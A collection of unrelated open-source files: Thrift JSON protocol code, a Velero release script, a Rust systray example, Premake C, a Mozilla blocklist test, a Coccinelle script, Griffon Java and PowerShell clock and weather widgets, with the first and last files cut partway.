list<i64>, mySimpleStruct // // this is not really necessary, because before calling // readStructBegin(), setNextStructType() should be called // but this allows only calling setNextStructType() on the // base type auto& field = ite->second; if (isCompoundType(*field.type_ref())) { nextType_ = getDataTypeFromTypeNum(*field.type_ref()); } return result; } } } // if the field is not found or // the entire struct is being skipped fieldId = 0; skipWhitespace(); uint8_t delimiter = reader_.read(); // delimiter should be ':' fieldType = guessTypeIdFromFirstByte(); bool wasPutBack = reader_.put(delimiter); (void)wasPutBack; assert(wasPutBack); return result + getNumSkippedChars(); } uint32_t TSimpleJSONProtocol::readFieldEnd() { return 0; } uint32_t TSimpleJSONProtocol::readMapBegin( TType& keyType, TType& valType, uint32_t& size, bool& sizeUnknown) { enterType(); auto currentType = getCurrentDataType(); bool beingSkipped = (currentType == nullptr); (void)beingSkipped; // since we never guess an unknown field to have a map type // we should never arrive here assert(!beingSkipped); auto keyTypeNum = currentType->mapKeyType_ref().value_or(0); auto valTypeNum = currentType->valueType_ref().value_or(0); keyType = getTypeIdFromTypeNum(keyTypeNum); valType = getTypeIdFromTypeNum(valTypeNum); size = 0; sizeUnknown = true; if (isCompoundType(keyTypeNum)) { nextType_ = getDataTypeFromTypeNum(keyTypeNum); } else if (isCompoundType(valTypeNum)) { nextType_ = getDataTypeFromTypeNum(valTypeNum); } return readJSONObjectStart(); } bool TSimpleJSONProtocol::peekMap() { skipWhitespace(); return reader_.peek() != kJSONObjectEnd; } uint32_t TSimpleJSONProtocol::readMapEnd() { uint32_t result = getNumSkippedChars() + readJSONObjectEnd(); exitType(); return result; } uint32_t TSimpleJSONProtocol::readListBegin( TType& elemType, uint32_t& size, bool& sizeUnknown) { enterType(); auto currentType = getCurrentDataType(); bool beingSkipped = (currentType == nullptr); if (beingSkipped) { uint32_t result = readJSONArrayStart(); elemType = guessTypeIdFromFirstByte(); size = 0; sizeUnknown = true; return result + getNumSkippedChars(); } else { auto elemTypeNum = currentType->valueType_ref().value_or(0); elemType = getTypeIdFromTypeNum(elemTypeNum); size = 0; sizeUnknown = true; if (isCompoundType(elemTypeNum)) { nextType_ = getDataTypeFromTypeNum(elemTypeNum); } return readJSONArrayStart(); } } bool TSimpleJSONProtocol::peekList() { skipWhitespace(); return reader_.peek() != kJSONArrayEnd; } uint32_t TSimpleJSONProtocol::readListEnd() { uint32_t result = getNumSkippedChars(); result += TVirtualProtocol<TSimpleJSONProtocol, TJSONProtocol>::readListEnd(); exitType(); return result; } uint32_t TSimpleJSONProtocol::readSetBegin( TType& elemType, uint32_t& size, bool& sizeUnknown) { enterType(); auto currentType = getCurrentDataType(); bool beingSkipped = (currentType == nullptr); (void)beingSkipped; // since we never guess an unknown field to have a set type // we should never arrive here assert(!beingSkipped); auto elemTypeNum = currentType->valueType_ref().value_or(0); elemType = getTypeIdFromTypeNum(elemTypeNum); size = 0; sizeUnknown = true; if (isCompoundType(elemTypeNum)) { nextType_ = getDataTypeFromTypeNum(elemTypeNum); } return readJSONArrayStart(); } bool TSimpleJSONProtocol::peekSet() { skipWhitespace(); return reader_.peek() != kJSONArrayEnd; } uint32_t TSimpleJSONProtocol::readSetEnd() { uint32_t result = getNumSkippedChars(); result += TVirtualProtocol<TSimpleJSONProtocol, TJSONProtocol>::readSetEnd(); exitType(); 
return result; } uint32_t TSimpleJSONProtocol::readBool(bool& value) { return readJSONBool(value); } TType TSimpleJSONProtocol::getTypeIdFromTypeNum(int64_t fieldType) { Type type = getType(fieldType); switch (type) { case Type::TYPE_VOID: return T_VOID; case Type::TYPE_STRING: return T_STRING; case Type::TYPE_BOOL: return T_BOOL; case Type::TYPE_BYTE: return T_BYTE; case Type::TYPE_I16: return T_I16; case Type::TYPE_I32: return T_I32; case Type::TYPE_I64: return T_I64; case Type::TYPE_DOUBLE: return T_DOUBLE; case Type::TYPE_FLOAT: return T_FLOAT; case Type::TYPE_LIST: return T_LIST; case Type::TYPE_SET: return T_SET; case Type::TYPE_MAP: return T_MAP; case Type::TYPE_STRUCT: return T_STRUCT; case Type::TYPE_ENUM: return T_I32; case Type::TYPE_SERVICE: case Type::TYPE_PROGRAM: default: throw TProtocolException( TProtocolException::NOT_IMPLEMENTED, "Unrecognized type"); } } /** * Given a byte, peeked from the beginning of some JSON value, determine a type * of that value. Result type is used to decide how to skip that value, so * differences between compatible types don't matter and the more general type * is assumed. * STOP is returned for } and ] to indicate end of collection. */ TType TSimpleJSONProtocol::guessTypeIdFromFirstByte() { skipWhitespace(); uint8_t byte = reader_.peek(); if (byte == kJSONObjectEnd || byte == kJSONArrayEnd) { return T_STOP; } else if (byte == kJSONStringDelimiter) { return T_STRING; } else if (byte == kJSONObjectStart) { return T_STRUCT; } else if (byte == kJSONArrayStart) { return T_LIST; } else if (byte == kJSONTrue[0] || byte == kJSONFalse[0]) { return T_BOOL; } else if ( byte == '+' || byte == '-' || byte == '.' || byte == '0' || byte == '1' || byte == '2' || byte == '3' || byte == '4' || byte == '5' || byte == '6' || byte == '7' || byte == '8' || byte == '9') { return T_DOUBLE; } else { throw TProtocolException( TProtocolException::NOT_IMPLEMENTED, "Unrecognized byte: " + std::string((char*)&byte, 1)); } } DataType* TSimpleJSONProtocol::getDataTypeFromTypeNum(int64_t typeNum) { auto ite = schema_.dataTypes_ref()->find(typeNum); if (ite == schema_.dataTypes_ref()->cend()) { throw TProtocolException( TProtocolException::INVALID_DATA, "Type id not found, schema is corrupted"); } return &(ite->second); } void TSimpleJSONProtocol::enterType() { typeStack_.push(nextType_); nextType_ = nullptr; } void TSimpleJSONProtocol::exitType() { auto lastType = getCurrentDataType(); typeStack_.pop(); auto currentType = getCurrentDataType(); if (!currentType) { nextType_ = nullptr; return; } auto mapKeyType = currentType->mapKeyType_ref(); auto valueType = currentType->valueType_ref(); if (mapKeyType && isCompoundType(*mapKeyType) && (!valueType || !isCompoundType(*valueType) || lastType == getDataTypeFromTypeNum(*valueType))) { nextType_ = getDataTypeFromTypeNum(*mapKeyType); } else if (valueType && isCompoundType(*valueType)) { nextType_ = getDataTypeFromTypeNum(*valueType); } else { nextType_ = nullptr; } } // returns nullptr when the struct is to be skipped const DataType* TSimpleJSONProtocol::getCurrentDataType() { if (!typeStack_.empty()) { return typeStack_.top(); } else { return nullptr; } } void TSimpleJSONProtocol::skipWhitespace() { numSkipped_ += this->skipJSONWhitespace(); } uint32_t TSimpleJSONProtocol::getNumSkippedChars() { auto temp = numSkipped_; numSkipped_ = 0; return temp; } bool TSimpleJSONProtocol::isCompoundType(int64_t fieldType) { return !isBaseType(getType(fieldType)); } } // namespace protocol } // namespace thrift } // namespace apache
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>clang_version</key> <string>Apple LLVM version 8.1.0 (clang-802.0.42)</string> <key>files</key> <array> </array> <key>diagnostics</key> <array> </array> </dict> </plist>
{ "pile_set_name": "Github" }
#!/usr/bin/env bash # Copyright 2020 the Velero contributors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # This script will do the necessary checks and actions to create a release of Velero. It will: # - validate that all prerequisites are met # - verify the version string is what the user expects. # - create a git tag # - push the created git tag to GitHub # - run GoReleaser # The following variables are needed: # - $VELERO_VERSION: defines the tag of Velero that any https://github.com/vmware-tanzu/velero/... # links in the docs should redirect to. # - $REMOTE: defines the remote that should be used when pushing tags and branches. Defaults to "upstream" # - $publish: TRUE/FALSE value where FALSE (or not including it) will indicate a dry-run, and TRUE, or simply adding 'publish', # will tag the release with the $VELERO_VERSION and push the tag to a remote named 'upstream'. # - $GITHUB_TOKEN: Needed to run the goreleaser process to generate a GitHub release. # Use https://github.com/settings/tokens/new?scopes=repo if you don't already have a token. # Regenerate an existing token: https://github.com/settings/tokens. # You may regenerate the token for every release if you prefer. # See https://goreleaser.com/environment/ for more details. # This script is meant to be a combination of documentation and executable. # If you have questions at any point, please stop and ask! # Directory in which the script itself resides, so we can use it for calling programs that are in the same directory. DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )" # Default to using upstream as the remote remote=${REMOTE:-upstream} # Parse out the branch we're on so we can switch back to it at the end of a dry-run, where we delete the tag. Requires git v1.8.1+ upstream_branch=$(git symbolic-ref --short HEAD) function tag_and_push() { echo "Tagging $VELERO_VERSION" git tag $VELERO_VERSION || true if [[ $publish == "TRUE" ]]; then echo "Pushing $VELERO_VERSION" git push "$remote" $VELERO_VERSION fi } # Default to a dry-run mode publish=FALSE if [[ "$1" = "publish" ]]; then publish=TRUE fi # For now, have the person doing the release pass in the VELERO_VERSION variable as an environment variable. # In the future, we might be able to inspect git via `git describe --abbrev=0` to get a hint for it. if [[ -z "$VELERO_VERSION" ]]; then printf "The \$VELERO_VERSION environment variable is not set. Please set it with\n\texport VELERO_VERSION=v<version.to.release>\nthen try again." exit 1 fi # Make sure the user's provided their github token, so we can give it to goreleaser. if [[ -z "$GITHUB_TOKEN" ]]; then printf "The GITHUB_TOKEN environment variable is not set. Please set it with\n\t export GITHUB_TOKEN=<your github token>\n then try again." exit 1 fi # Ensure that we have a clean working tree before we let any changes happen, especially important for cutting release branches. if [[ -n $(git status --short) ]]; then echo "Your git working directory is dirty! 
Please clean up untracked files and stash any changes before proceeding." exit 3 fi # Make sure that there's no issue with the environment variable's format before trying to eval the parsed version. if ! go run $DIR/chk_version.go --verify; then exit 2 fi # Since we're past the validation of the VELERO_VERSION, parse the version's individual components. eval $(go run $DIR/chk_version.go) printf "To clarify, you've provided a version string of $VELERO_VERSION.\n" printf "Based on this, the following assumptions have been made: \n" [[ "$VELERO_PATCH" != 0 ]] && printf "*\t This is a patch release.\n" # $VELERO_PRERELEASE gets populated by the chk_version.go script that parses and verifies the given version format # -n is "string is non-empty" [[ -n $VELERO_PRERELEASE ]] && printf "*\t This is a pre-release.\n" # -z is "string is empty" [[ -z $VELERO_PRERELEASE ]] && printf "*\t This is a GA release.\n" if [[ $publish == "TRUE" ]]; then echo "If this is all correct, press enter/return to proceed to TAG THE RELEASE and UPLOAD THE TAG TO GITHUB." else echo "If this is all correct, press enter/return to proceed to TAG THE RELEASE and PROCEED WITH THE DRY-RUN." fi echo "Otherwise, press ctrl-c to CANCEL the process without making any changes." read -p "Ready to continue? " echo "Alright, let's go." echo "Pulling down all git tags and branches before doing any work." git fetch "$remote" --tags # $VELERO_PATCH gets populated by the chk_version.go scrip that parses and verifies the given version format # If we've got a patch release, we'll need to create a release branch for it. if [[ "$VELERO_PATCH" > 0 ]]; then release_branch_name=release-$VELERO_MAJOR.$VELERO_MINOR # Check if the branch exists, creating it if not. # The fetch command above should have gotten all the upstream branches, so we can safely assume this check is local & upstream branches. if [[ -z $(git branch | grep $release_branch_name) ]]; then git checkout -b $release_branch_name echo "Release branch made." else echo "Release branch $release_branch_name exists already." git checkout $release_branch_name fi echo "Now you'll need to cherry-pick any relevant git commits into this release branch." echo "Either pause this script with ctrl-z, or open a new terminal window and do the cherry-picking." if [[ $publish == "TRUE" ]]; then read -p "Press enter when you're done cherry-picking. THIS WILL MAKE A TAG PUSH THE BRANCH TO $remote" else read -p "Press enter when you're done cherry-picking." fi # TODO can/should we add a way to review the cherry-picked commits before the push? if [[ $publish == "TRUE" ]]; then echo "Pushing $release_branch_name to \"$remote\" remote" git push --set-upstream "$remote" $release_branch_name fi tag_and_push else echo "Checking out $remote/main." git checkout "$remote"/main tag_and_push fi echo "Invoking Goreleaser to create the GitHub release." RELEASE_NOTES_FILE=changelogs/CHANGELOG-$VELERO_MAJOR.$VELERO_MINOR.md \ PUBLISH=$publish \ make release if [[ $publish == "FALSE" ]]; then # Delete the local tag so we don't potentially conflict when it's re-run for real. # This also means we won't have to just ignore existing tags in tag_and_push, which could be a problem if there's an existing tag. echo "Dry run complete. Deleting git tag $VELERO_VERSION" git checkout $upstream_branch git tag -d $VELERO_VERSION fi
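Tying the header comments together, a typical session with this script is a dry run followed by a publishing run, as in the hedged sketch below. The script path shown is an assumption, and the version and token values are placeholders.

# Hypothetical usage of the release script above; the script location is an assumption.
export VELERO_VERSION=v1.2.3                                   # version to tag (placeholder)
export GITHUB_TOKEN="<personal access token with repo scope>"  # needed by goreleaser (placeholder)
export REMOTE=upstream                                         # optional; "upstream" is already the default
# Dry run: tags locally, runs goreleaser, then deletes the local tag again.
./hack/release-tools/tag-release.sh
# Real release: pushes the tag (and the release branch, for patch releases) and publishes.
./hack/release-tools/tag-release.sh publish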
{ "pile_set_name": "Github" }
#![windows_subsystem = "windows"]

//#[cfg(target_os = "windows")]
fn main() -> Result<(), systray::Error> {
    let mut app;
    match systray::Application::new() {
        Ok(w) => app = w,
        Err(_) => panic!("Can't create window!"),
    }
    // w.set_icon_from_file(&"C:\\Users\\qdot\\code\\git-projects\\systray-rs\\resources\\rust.ico".to_string());
    // w.set_tooltip(&"Whatever".to_string());
    app.set_icon_from_file("/usr/share/gxkb/flags/ua.png")?;
    app.add_menu_item("Print a thing", |_| {
        println!("Printing a thing!");
        Ok::<_, systray::Error>(())
    })?;
    app.add_menu_item("Add Menu Item", |window| {
        window.add_menu_item("Interior item", |_| {
            println!("what");
            Ok::<_, systray::Error>(())
        })?;
        window.add_menu_separator()?;
        Ok::<_, systray::Error>(())
    })?;
    app.add_menu_separator()?;
    app.add_menu_item("Quit", |window| {
        window.quit();
        Ok::<_, systray::Error>(())
    })?;
    println!("Waiting on message!");
    app.wait_for_message()?;
    Ok(())
}

// #[cfg(not(target_os = "windows"))]
// fn main() {
//     panic!("Not implemented on this platform!");
// }
{ "pile_set_name": "Github" }
/** * \file os_rename.c * \brief Rename a path on Windows. * \author Copyright (c) 2002-2013 Jason Perkins and the Premake project */ #include "premake.h" #if PLATFORM_WINDOWS int os_rename(lua_State* L) { const char *fromname = luaL_checkstring(L, 1); const char *toname = luaL_checkstring(L, 2); wchar_t wide_frompath[PATH_MAX]; if (MultiByteToWideChar(CP_UTF8, 0, fromname, -1, wide_frompath, PATH_MAX) == 0) { lua_pushstring(L, "unable to encode source path"); return lua_error(L); } wchar_t wide_topath[PATH_MAX]; if (MultiByteToWideChar(CP_UTF8, 0, toname, -1, wide_topath, PATH_MAX) == 0) { lua_pushstring(L, "unable to encode dest path"); return lua_error(L); } if (MoveFileExW(wide_frompath, wide_topath, MOVEFILE_COPY_ALLOWED)) { lua_pushboolean(L, 1); return 1; } else { DWORD err = GetLastError(); char unicodeErr[512]; LPWSTR messageBuffer = NULL; if (FormatMessageW(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, NULL, err, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPWSTR) &messageBuffer, 0, NULL) != 0) { if (WideCharToMultiByte(CP_UTF8, 0, messageBuffer, -1, unicodeErr, sizeof(unicodeErr), NULL, NULL) == 0) strcpy(unicodeErr, "failed to translate error message"); LocalFree(messageBuffer); } else strcpy(unicodeErr, "failed to get error message"); lua_pushnil(L); lua_pushfstring(L, "%s: %s", fromname, unicodeErr); lua_pushinteger(L, err); return 3; } } #endif
{ "pile_set_name": "Github" }
/* Any copyright is dedicated to the Public Domain.
 * http://creativecommons.org/publicdomain/zero/1.0/
 */

const KEY_PROFILEDIR = "ProfD";
const KEY_APPDIR = "XCurProcD";
const FILE_BLOCKLIST = "blocklist.xml";
const PREF_BLOCKLIST_ENABLED = "extensions.blocklist.enabled";

const OLD = do_get_file("data/test_overrideblocklist/old.xml");
const NEW = do_get_file("data/test_overrideblocklist/new.xml");
const ANCIENT = do_get_file("data/test_overrideblocklist/ancient.xml");
const OLD_TSTAMP = 1296046918000;
const NEW_TSTAMP = 1396046918000;

const gAppDir = FileUtils.getFile(KEY_APPDIR, []);

let oldAddon = { id: "[email protected]", version: 1 }
let newAddon = { id: "[email protected]", version: 1 }
let ancientAddon = { id: "[email protected]", version: 1 }
let invalidAddon = { id: "[email protected]", version: 1 }

function incrementAppVersion() {
  gAppInfo.version = "" + (parseInt(gAppInfo.version) + 1);
}

function clearBlocklists() {
  let blocklist = FileUtils.getFile(KEY_APPDIR, [FILE_BLOCKLIST]);
  if (blocklist.exists())
    blocklist.remove(true);

  blocklist = FileUtils.getFile(KEY_PROFILEDIR, [FILE_BLOCKLIST]);
  if (blocklist.exists())
    blocklist.remove(true);
}

function reloadBlocklist() {
  Services.prefs.setBoolPref(PREF_BLOCKLIST_ENABLED, false);
  Services.prefs.setBoolPref(PREF_BLOCKLIST_ENABLED, true);
}

function copyToApp(file) {
  file.clone().copyTo(gAppDir, FILE_BLOCKLIST);
}

function copyToProfile(file, tstamp) {
  file = file.clone();
  file.copyTo(gProfD, FILE_BLOCKLIST);
  file = gProfD.clone();
  file.append(FILE_BLOCKLIST);
  file.lastModifiedTime = tstamp;
}

function run_test() {
  createAppInfo("[email protected]", "XPCShell", "1", "1");

  let appBlocklist = FileUtils.getFile(KEY_APPDIR, [FILE_BLOCKLIST]);
  if (appBlocklist.exists()) {
    try {
      appBlocklist.moveTo(gAppDir, "blocklist.old");
    } catch (e) {
      todo(false, "Aborting test due to unmovable blocklist file: " + e);
      return;
    }
    do_register_cleanup(function() {
      clearBlocklists();
      appBlocklist.moveTo(gAppDir, FILE_BLOCKLIST);
    });
  }

  run_next_test();
}

// On first run whatever is in the app dir should get copied to the profile
add_test(function test_copy() {
  clearBlocklists();
  copyToApp(OLD);

  incrementAppVersion();
  startupManager();
  reloadBlocklist();

  let blocklist = AM_Cc["@mozilla.org/extensions/blocklist;1"].
                  getService(AM_Ci.nsIBlocklistService);
  do_check_false(blocklist.isAddonBlocklisted(invalidAddon));
  do_check_false(blocklist.isAddonBlocklisted(ancientAddon));
  do_check_true(blocklist.isAddonBlocklisted(oldAddon));
  do_check_false(blocklist.isAddonBlocklisted(newAddon));

  shutdownManager();

  run_next_test();
});

// An ancient blocklist should be ignored
add_test(function test_ancient() {
  clearBlocklists();
  copyToApp(ANCIENT);
  copyToProfile(OLD, OLD_TSTAMP);

  incrementAppVersion();
  startupManager();
  reloadBlocklist();

  let blocklist = AM_Cc["@mozilla.org/extensions/blocklist;1"].
                  getService(AM_Ci.nsIBlocklistService);
  do_check_false(blocklist.isAddonBlocklisted(invalidAddon));
  do_check_false(blocklist.isAddonBlocklisted(ancientAddon));
  do_check_true(blocklist.isAddonBlocklisted(oldAddon));
  do_check_false(blocklist.isAddonBlocklisted(newAddon));

  shutdownManager();

  run_next_test();
});

// A new blocklist should override an old blocklist
add_test(function test_override() {
  clearBlocklists();
  copyToApp(NEW);
  copyToProfile(OLD, OLD_TSTAMP);

  incrementAppVersion();
  startupManager();
  reloadBlocklist();

  let blocklist = AM_Cc["@mozilla.org/extensions/blocklist;1"].
                  getService(AM_Ci.nsIBlocklistService);
  do_check_false(blocklist.isAddonBlocklisted(invalidAddon));
  do_check_false(blocklist.isAddonBlocklisted(ancientAddon));
  do_check_false(blocklist.isAddonBlocklisted(oldAddon));
  do_check_true(blocklist.isAddonBlocklisted(newAddon));

  shutdownManager();

  run_next_test();
});

// An old blocklist shouldn't override a new blocklist
add_test(function test_retain() {
  clearBlocklists();
  copyToApp(OLD);
  copyToProfile(NEW, NEW_TSTAMP);

  incrementAppVersion();
  startupManager();
  reloadBlocklist();

  let blocklist = AM_Cc["@mozilla.org/extensions/blocklist;1"].
                  getService(AM_Ci.nsIBlocklistService);
  do_check_false(blocklist.isAddonBlocklisted(invalidAddon));
  do_check_false(blocklist.isAddonBlocklisted(ancientAddon));
  do_check_false(blocklist.isAddonBlocklisted(oldAddon));
  do_check_true(blocklist.isAddonBlocklisted(newAddon));

  shutdownManager();

  run_next_test();
});

// A missing blocklist in the profile should still load an app-shipped blocklist
add_test(function test_missing() {
  clearBlocklists();
  copyToApp(OLD);
  copyToProfile(NEW, NEW_TSTAMP);

  incrementAppVersion();
  startupManager();
  shutdownManager();

  let blocklist = FileUtils.getFile(KEY_PROFILEDIR, [FILE_BLOCKLIST]);
  blocklist.remove(true);

  startupManager(false);
  reloadBlocklist();

  // Reuse the existing binding; redeclaring it with "let" in the same scope is an error.
  blocklist = AM_Cc["@mozilla.org/extensions/blocklist;1"].
              getService(AM_Ci.nsIBlocklistService);
  do_check_false(blocklist.isAddonBlocklisted(invalidAddon));
  do_check_false(blocklist.isAddonBlocklisted(ancientAddon));
  do_check_true(blocklist.isAddonBlocklisted(oldAddon));
  do_check_false(blocklist.isAddonBlocklisted(newAddon));

  shutdownManager();

  run_next_test();
});
{ "pile_set_name": "Github" }
/* * super.h */ int befs_load_sb(struct super_block *sb, befs_super_block *disk_sb); int befs_check_sb(struct super_block *sb);
{ "pile_set_name": "Github" }
// SPDX-License-Identifier: GPL-2.0 /// Make sure (of/i2c/platform)_device_id tables are NULL terminated // // Keywords: of_table i2c_table platform_table // Confidence: Medium // Options: --include-headers virtual patch virtual context virtual org virtual report @depends on context@ identifier var, arr; expression E; @@ ( struct \(of_device_id \| i2c_device_id \| platform_device_id\) arr[] = { ..., { .var = E, * } }; | struct \(of_device_id \| i2c_device_id \| platform_device_id\) arr[] = { ..., * { ..., E, ... }, }; ) @depends on patch@ identifier var, arr; expression E; @@ ( struct \(of_device_id \| i2c_device_id \| platform_device_id\) arr[] = { ..., { .var = E, - } + }, + { } }; | struct \(of_device_id \| i2c_device_id \| platform_device_id\) arr[] = { ..., { ..., E, ... }, + { }, }; ) @r depends on org || report@ position p1; identifier var, arr; expression E; @@ ( struct \(of_device_id \| i2c_device_id \| platform_device_id\) arr[] = { ..., { .var = E, } @p1 }; | struct \(of_device_id \| i2c_device_id \| platform_device_id\) arr[] = { ..., { ..., E, ... } @p1 }; ) @script:python depends on org@ p1 << r.p1; arr << r.arr; @@ cocci.print_main(arr,p1) @script:python depends on report@ p1 << r.p1; arr << r.arr; @@ msg = "%s is not NULL terminated at line %s" % (arr, p1[0].line) coccilib.report.print_report(p1[0],msg)
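Because the semantic patch above only declares virtual modes (patch, context, org, report), the desired mode has to be selected on the spatch command line with -D. A hedged invocation sketch follows; the .cocci file name and the target directory are assumptions.

# Hypothetical spatch runs for the semantic patch above; the file name and directories are assumptions.
# Report mode: prints "<arr> is not NULL terminated at line <n>" for each offending table.
spatch --sp-file of_table.cocci --include-headers -D report --dir drivers/of/
# Patch mode: emits a diff that appends the missing { } sentinel entry.
spatch --sp-file of_table.cocci --include-headers -D patch --dir drivers/of/ > of_table.fixes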
{ "pile_set_name": "Github" }
/* * SPDX-License-Identifier: Apache-2.0 * * Copyright 2008-2020 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.codehaus.griffon.runtime.javafx.groovy; import griffon.annotations.inject.DependsOn; import griffon.builder.javafx.JavafxBuilderCustomizer; import griffon.core.injection.Module; import griffon.javafx.JavaFXWindowDisplayHandler; import griffon.util.groovy.BuilderCustomizer; import org.codehaus.griffon.runtime.core.injection.AbstractModule; import org.kordamp.jipsy.ServiceProviderFor; import javax.inject.Named; import static griffon.util.AnnotationUtils.named; /** * @author Andres Almiray */ @ServiceProviderFor(Module.class) @DependsOn("javafx") @Named("javafx-groovy") public class JavafxBuilderModule extends AbstractModule { @Override protected void doConfigure() { // tag::bindings[] bind(BuilderCustomizer.class) .to(JavafxBuilderCustomizer.class) .asSingleton(); bind(JavaFXWindowDisplayHandler.class) .withClassifier(named("windowDisplayHandler")) .to(GroovyAwareConfigurableJavaFXWindowDisplayHandler.class) .asSingleton(); // end::bindings[] } }
{ "pile_set_name": "Github" }
## A really fancy clock Import-Module ShowUI -FOrce New-UIWidget -AsJob -Content { $shadow = DropShadowEffect -Color Black -Shadow 0 -Blur 8 $now = Get-Date; StackPanel { TextBlock -Name "Time" ('{0:h:mm tt}' -f $now) -FontSize 108 -LineHeight 100 -LineStackingStrategy BlockLineHeight -Margin 0 -Padding 0 -Foreground White -Effect $shadow -FontFamily "Century Gothic" StackPanel -Orientation Horizontal { TextBlock -Name "Day" ('{0:dd}' -f $now) -FontSize 80 -LineHeight 80 -LineStackingStrategy BlockLineHeight -Margin 0 -Padding 0 -Foreground White -Opacity 0.6 -Effect $shadow -FontFamily "Century Gothic" StackPanel { TextBlock -Name "Month" ('{0:MMMM}' -f $now).ToUpper() -fontsize 40 -LineHeight 40 -LineStackingStrategy BlockLineHeight -Margin 0 -Padding 0 -FontFamily "Century Gothic" TextBlock -Name "Weekday" ('{0:dddd}' -f $now).ToUpper() -fontsize 28 -LineHeight 28 -LineStackingStrategy BlockLineHeight -Margin 0 -Padding 0 -Foreground White -Effect $shadow -FontFamily "Century Gothic" } -Margin 0 } -Margin 0 } -Margin 0 } -Interval "0:0:0.2" -UpdateBlock { $now = Get-Date $Time.Text = '{0:h:mm tt}' -f $now $Day.Text = '{0:dd}' -f $now $Month.Text = ('{0:MMMM}' -f $now).ToUpper() $Weekday.Text = ('{0:dddd}' -f $now).ToUpper() } ## And a slick weather widget using Yahoo's forecast and images New-UIWidget -AsJob { Grid { Rectangle -RadiusX 10 -RadiusY 10 -StrokeThickness 0 -Width 170 -Height 80 -HorizontalAlignment Left -VerticalAlignment Top -Margin "60,40,0,0" -Fill { LinearGradientBrush -Start "0.5,0" -End "0.5,1" -Gradient { GradientStop -Color "#FF007bff" -Offset 0 GradientStop -Color "#FF40d6ff" -Offset 1 } } Image -Name Image -Stretch Uniform -Width 250.0 -Height 180.0 -Source "http://l.yimg.com/a/i/us/nws/weather/gr/31d.png" TextBlock -Name Temp -Text "99°" -FontSize 80 -Foreground White -Margin "130,0,0,0" -Effect { DropShadowEffect -Color Black -Shadow 0 -Blur 8 } TextBlock -Name Forecast -Text "Forecast" -FontSize 12 -Foreground White -Margin "120,95,0,0" } } -Refresh "00:10" { # To find your WOEID, browse or search for your city from the Weather home page. # The WOEID is the LAST PART OF the URL for the forecast page for that city. $woEID = 14586 $channel = ([xml](New-Object Net.WebClient).DownloadString("http://weather.yahooapis.com/forecastrss?p=$woEID")).rss.channel $h = ([int](Get-Date -f hh)) if($h -gt ([DateTime]$channel.astronomy.sunrise).Hour -and $h -lt ([DateTime]$channel.astronomy.sunset).Hour) { $dayOrNight = 'd' } else { $dayOrNight = 'n' } $source = "http`://l.yimg.com/a/i/us/nws/weather/gr/{0}{1}.png" -f $channel.item.condition.code, $dayOrNight $Image.Source = $source $Temp.Text = $channel.item.condition.temp + [char]176 $Forecast.Text = "High: {0}{2} Low: {1}{2}" -f $channel.item.forecast[0].high, $channel.item.forecast[0].low, [char]176 } ## An analog clock with "hands" and an old-school ticking motion. 
New-UIWidget -AsJob -Content { $shadow = DropShadowEffect -Color Black -Shadow 0 -Blur 8 Grid { Ellipse -Fill Transparent -Stroke Black -StrokeThickness 4 -Width 300 -Height 300 Ellipse -Fill Transparent -Stroke Black -StrokeThickness 6 -Width 290 -Height 290 -StrokeDashArray 1,11.406 Ellipse -Fill Transparent -Stroke Black -StrokeThickness 10 -Width 280 -Height 280 -StrokeDashArray 64.25 Ellipse -Fill Transparent -Stroke Black -StrokeThickness 5 -Width 255 -Height 255 -StrokeDashArray 60,59 Ellipse -Name Hour -Fill Transparent -Stroke White -StrokeThickness 100 -Width 255 -Height 255 -StrokeDashArray 0.04,300 -RenderTransformOrigin "0.5,0.5" -RenderTransform { RotateTransform -Angle -90 } -Effect $shadow Ellipse -Name Minute -Fill Transparent -Stroke '#FFC0B7B7' -StrokeThickness 100 -Width 275 -Height 275 -StrokeDashArray 0.05,300 -RenderTransformOrigin "0.5,0.5" -RenderTransform { RotateTransform -Angle -90 } -Effect $shadow Ellipse -Name Second -Fill Transparent -Stroke '#FF31C2FF' -StrokeThickness 100 -Width 215 -Height 215 -StrokeDashArray 0.02,300 -RenderTransformOrigin "0.5,0.5" -RenderTransform { RotateTransform -Angle -90 } -Effect $shadow } } -Refresh "00:00:00.2" -Update { $now = Get-Date $deg = (1/60) * 360 $Hour.RenderTransform.Angle = $now.Hour * 5 * $deg -90 $Minute.RenderTransform.Angle = $now.Minute * $deg -90 $Second.RenderTransform.Angle = $now.Second * $deg -90 } ## A variation on the target clock, without the smooth animated "quartz movement" New-UIWidget { Grid { $shadow = DropShadowEffect -ShadowDepth 0 -BlurRadius 5 -Direction 0 Ellipse -Name Hour -Fill Transparent -Stroke Black -StrokeThickness 100 -Width 350 -Height 350 -StrokeDashArray 7.85,7.85 -RenderTransformOrigin "0.5,0.5" -RenderTransform { RotateTransform -Angle -90 } Ellipse -Name Minute -Fill Transparent -Stroke Gray -StrokeThickness 75 -Width 325 -Height 325 -StrokeDashArray 10.468,10.468 -RenderTransformOrigin "0.5,0.5" -RenderTransform { RotateTransform -Angle -90 } Ellipse -Name Second -Fill Transparent -Stroke White -StrokeThickness 50 -Width 300 -Height 300 -StrokeDashArray 15.71,15.71 -RenderTransformOrigin "0.5,0.5" -RenderTransform { RotateTransform -Angle -90 } } } -Refresh "00:00:00.2" { $now = Get-Date $Hour.StrokeDashArray[0] = $Hour.StrokeDashArray[1]/60 * $now.Hour * 5 $Minute.StrokeDashArray[0] = $Minute.StrokeDashArray[1]/60 * 